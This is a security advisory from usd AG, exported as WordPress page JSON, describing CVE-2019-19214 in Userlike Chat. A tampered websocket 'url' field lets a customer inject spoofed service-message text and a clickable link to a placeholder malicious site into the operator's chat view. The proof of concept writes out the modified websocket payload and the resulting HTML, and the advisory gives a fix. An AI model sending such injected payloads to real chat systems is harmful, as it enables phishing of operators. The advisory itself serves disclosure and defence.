{"id":16633,"date":"2021-07-07T16:01:42","date_gmt":"2021-07-07T14:01:42","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0058\/"},"modified":"2021-07-19T14:12:43","modified_gmt":"2021-07-19T12:12:43","slug":"usd-2019-0058","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0058\/","title":{"rendered":"usd-2019-0058"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2019-0058 | Userlike Chat<\/span><\/h1>\n<p><strong>Advisory ID<\/strong><span>: usd-2019-0058<\/span><br \/><strong>CVE Number<\/strong><span>: CVE-2019-19214<\/span><br \/><strong>Affected Product<\/strong><span>: Userlike Chat<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Insufficient Filtering<\/span><br \/><strong>Security Risk<\/strong><span>: Low<\/span><br \/><strong>Vendor URL<\/strong><span>: <a href=\"https:\/\/userlike.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/userlike.com<\/a><\/span><br \/><strong>Vendor Status<\/strong><span>: Fixed (not verified)<\/span><\/p>\n<h3>Description<\/h3>\n<p><span>Userlike does not handle data received via websocket requests correctly; a malicious client may therefore inject content (including links) that is embedded in the operator\u2019s chat view.<\/span><\/p>\n<h3>Introduction<\/h3>\n<p><span>Userlike\u2019s chat software contains an insufficient filtering vulnerability that enables customers to send information to chat operators which may appear to be service messages 
from the chat system. These spoofed messages may contain links that are rendered as clickable links.<\/span><\/p>\n<p>[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2021\/07\/3.png\" title_text=\"3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][\/et_pb_image][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h3><span>Proof of Concept (PoC)<\/span><\/h3>\n<div class=\"x-text\">\n<p>1. [Customer] Start a chat session on the company\u2019s website.<\/p>\n<p>2. [Customer] Intercept the traffic, including websocket requests, and forward it until the following websocket request is about to be sent:<\/p>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<pre><code>42[\"message\",{\"info\":\"chat_info\",\"body\":{\"conversation_id\":126550,\"info\":{\"url\":\"http:\/\/localhost:8000\/userlike_widget_demo.html\",\"page_impressions\":3}},\"context\":4}]<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<p><span>2.1 [Customer] Edit the request\u2019s <code>url<\/code> parameter and forward the request:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<pre><code>42[\"message\",{\"info\":\"chat_info\",\"body\":{\"conversation_id\":126550,\"info\":{\"url\":\"http:\/\/google.de\/usd\nHier kann der Angreifer beliebigen Text schreiben.\nKlicken Sie bitte hier: http:\/\/www.evil.de\",\"page_impressions\":3}},\"context\":4}]<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<p><span>3. 
[Operator] In the operator\u2019s chat view the service message is rendered, including the spoofed content:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]<pre><code>&lt;span&gt;Contact navigated to URL &lt;a class=\"Link\" href=\"http:\/\/google.de\/usd\nHier\" target=\"_blank\"&gt;http:\/\/google.de\/usd\nHier&lt;\/a&gt; kann der Angreifer beliebigen Text schreiben.\nKlicken Sie bitte hier: &lt;a class=\"Link\" href=\"http:\/\/www.evil.de\" target=\"_blank\"&gt;http:\/\/www.evil.de&lt;\/a&gt;&lt;\/span&gt;<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Treat websocket requests sent by the client as regular user-controlled data. 
Make sure to encode or filter user-controlled content before embedding and replaying it.<\/span><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li>2019-09-18 This vulnerability was found by Konstantin Samuel during a pentest<\/li>\n<li>2019-11-14 Vendor schedules update for this date<\/li>\n<li>2020-04-29 <span>Security advisory released<\/span><\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><span>This security vulnerability was found by Konstantin Samuel of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2019-0058 | Userlike Chat Advisory ID: usd-2019-0058CVE Number: CVE-2019-19214Affected Product: Userlike ChatVulnerability Type: Insufficient FilteringSecurity Risk: LowVendor URL: https:\/\/userlike.comVendor Status: Fixed (not verified) Description Userlike does not handle data received via websocket requests correctly, thus a malicious client may inject content (including links) that is embedded in the operator\u2019s chat view. 
Introduction Userlike\u2019s chat software [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16633","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16633","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16633"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16633\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}